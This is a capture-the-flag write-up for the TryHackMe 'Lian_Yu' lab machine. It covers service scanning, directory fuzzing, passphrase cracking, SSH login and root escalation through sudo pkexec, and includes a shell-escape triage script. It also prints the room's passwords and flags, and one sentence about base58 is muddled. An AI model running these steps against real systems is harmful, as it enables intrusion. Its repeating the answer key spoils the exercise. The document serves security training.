TryHackMe - Lian_Yu - Writeup
A beginner level security challenge
Nmap scan
root@ip-10-10-187-225:~# nmap -sCV -A 10.10.87.122
Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-17 18:18 BST
Nmap scan report for ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)
Host is up (0.00077s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (EdDSA)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43649/udp status
|_ 100024 1 45593/tcp status
MAC Address: 02:3A:57:44:F8:BD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.77 ms ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
Directory fuzzing
root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.87.122
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,cgi,css,js,py,conf,php,sh,html
[+] Timeout: 10s
===============================================================
2021/06/17 18:27:20 Starting gobuster
===============================================================
/index.html (Status: 200)
/island (Status: 301)
/server-status (Status: 403)
Progress: 194700 / 220561 (88.27%)
Nothing else of interest turned up at the web root, so fuzz the /island directory next:
root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.87.122/island
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: cgi,css,js,py,conf,php,sh,txt,html
[+] Timeout: 10s
===============================================================
2021/06/17 18:59:14 Starting gobuster
===============================================================
/index.html (Status: 200)
/2100 (Status: 301)
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
The hidden text on http://10.10.87.122/island (white text inside the h2, invisible on the page but plain in the source) is vigilante.
In the source of /island/2100/ there is a hint about a file extension, .ticket:
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
Add .ticket to the gobuster extension list and fuzz /island/2100 again:
root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf,ticket
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.87.122/island/2100
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,py,sh,txt,cgi,conf,ticket,php,css,js
[+] Timeout: 10s
===============================================================
2021/06/17 19:10:55 Starting gobuster
===============================================================
/index.html (Status: 200)
/green_arrow.ticket (Status: 200)
Download green_arrow.ticket. It contains:
This is just a token to get into Queen's Gambit(Ship)
RTy8yhBQdscX
The token is base58 (no 0, O, I or l in it, which rules base64 in and base58 out only by decoding). Decode it with CyberChef's From Base58 recipe to get the FTP password.
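The decoding step, as an added example rather than the writeup's own method: a stand-alone base58 decoder (the Bitcoin alphabet CyberChef uses by default), plus a small helper that tries hex, base32, base64 and base58 on a token and keeps only the decodings that come out as printable ASCII. That second function is the quick way to answer "which encoding is this?" when the room does not tell you; the token below is the one from green_arrow.ticket.

```python
import base64
import binascii

# Bitcoin base58 alphabet: no 0, O, I or l. CyberChef's default.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(s):
    """Decode a base58 string to bytes; leading '1's become leading 0x00 bytes."""
    n = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid base58 character {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(data):
    """Inverse of b58decode, used here to round-trip check a decoding."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def printable(data):
    return bool(data) and all(32 <= b < 127 for b in data)


def identify(token):
    """Try common text encodings; return {name: text} for printable results."""
    candidates = {
        "hex": bytes.fromhex,
        "base32": lambda t: base64.b32decode(t, casefold=True),
        "base64": lambda t: base64.b64decode(t, validate=True),
        "base58": b58decode,
    }
    hits = {}
    for name, fn in candidates.items():
        try:
            data = fn(token)
        except (ValueError, binascii.Error):
            continue
        if printable(data):
            hits[name] = data.decode("ascii")
    return hits


# Token from green_arrow.ticket.
TOKEN = "RTy8yhBQdscX"

if __name__ == "__main__":
    print(identify(TOKEN))  # only base58 yields printable text
```

Note that the token is also valid base64 (12 characters, all in the alphabet), which is why decoding it as base64 first is tempting; that decoding produces non-printable bytes and is dropped, while base58 gives the password.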
- what is the FTP Password?
Answer: !#th3h00d
Use the hidden text from http://10.10.87.122/island, vigilante, as the FTP username, with the password we decoded:
root@ip-10-10-187-225:~# ftp 10.10.87.122
Connected to 10.10.87.122.
220 (vsFTPd 3.0.2)
Name (10.10.87.122:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
226 Directory send OK.
Get all three image files. There is also another user, slade. Two of the three images are fine, but Leave_me_alone.png is broken; running strings on it turns up nothing but random data. Next up is aa.jpg:
root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Interesting. Let's use stegcracker to brute-force the passphrase with rockyou:
root@ip-10-10-187-225:~# stegcracker aa.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)
Counting lines in wordlist..
Attacking file 'aa.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: password
Tried 4 passwords
Your file has been written to: aa.jpg.out
The passphrase is password. stegcracker already wrote the payload to aa.jpg.out; re-running steghide with the passphrase gives it its embedded file name:
root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase:
wrote extracted data to "ss.zip".
Extract ss.zip:
root@ip-10-10-68-68:~# unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
root@ip-10-10-68-68:~# cat shado
M3tahuman
It could be the SSH password.
- what is the file name with SSH password?
Answer: shado
I tried to log in with the FTP username, but it didn't work with that password. The other user is slade,
so I used that username with the SSH password. It worked.
root@ip-10-10-68-68:~# ssh slade@10.10.87.122
slade@10.10.87.122's password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
slade@LianYu:~$ ls
user.txt
slade@LianYu:~$ cat user.txt
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
--Felicity Smoak
- user.txt
Answer: THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$
User slade can run /usr/bin/pkexec as root (PASSWD, so slade's own password is required). GTFOBins lists a sudo entry for pkexec: because sudo already runs it as root, pkexec will execute whatever command it is given, including a shell:
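Reading sudo -l by eye is fine for one rule, but a box with several rules is easier to triage with a script. The following is an added example, not the writeup's own tooling: it parses the rule lines of sudo -l (runas spec, tags such as PASSWD/NOPASSWD, and comma-separated commands) and matches each root-capable command against a small, hand-written subset of GTFOBins sudo shell escapes. The escape table is an assumption and deliberately incomplete; the first sample input is the sudo -l output above, the second is constructed.

```python
import re

# Assumed, hand-written subset of GTFOBins "sudo" shell escapes, keyed by
# binary basename. Not exhaustive; add entries for the binaries you meet.
SHELL_ESCAPES = {
    "pkexec": "sudo pkexec /bin/sh",
    "vim":    "sudo vim -c ':!/bin/sh'",
    "find":   "sudo find . -exec /bin/sh \\; -quit",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "less":   "sudo less /etc/profile   (then type !/bin/sh)",
}

# "(runas) TAG: TAG: cmd1, cmd2" with the tag list optional.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(output):
    """Parse the rule lines of `sudo -l` into dicts: runas, tags, command."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the "Matching Defaults entries" block
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        tagset = {t.rstrip(":") for t in tags.split()}
        for cmd in cmds.split(", "):
            rules.append({"runas": runas.strip(), "tags": tagset,
                          "command": cmd.strip()})
    return rules


def privesc_candidates(rules):
    """Return (command, suggested escape, needs_password) for root-capable rules."""
    out = []
    for r in rules:
        runas_user = r["runas"].split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue
        needs_password = "NOPASSWD" not in r["tags"]
        if r["command"] == "ALL":
            out.append((r["command"], "sudo /bin/sh", needs_password))
            continue
        name = r["command"].split()[0].rsplit("/", 1)[-1]
        if name in SHELL_ESCAPES:
            out.append((r["command"], SHELL_ESCAPES[name], needs_password))
    return out


# Sample input: the sudo -l output from the box, copied verbatim.
SUDO_L = r"""Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
"""

if __name__ == "__main__":
    for cmd, escape, pw in privesc_candidates(parse_sudo_l(SUDO_L)):
        print(f"{cmd}: {escape}  (password required: {pw})")
```

Pipe sudo -l into it on the target (sudo -l | python3 triage.py after swapping the sample for sys.stdin.read()); anything it prints is worth trying before hunting for SUID binaries or kernel exploits.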
slade@LianYu:~$ sudo pkexec /bin/sh
# whoami
root
# cat /root/root.txt
Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}
--DEATHSTROKE
Let me know your comments about this machine :)
I am available on Twitter: @User6825
Room link: Lian_Yu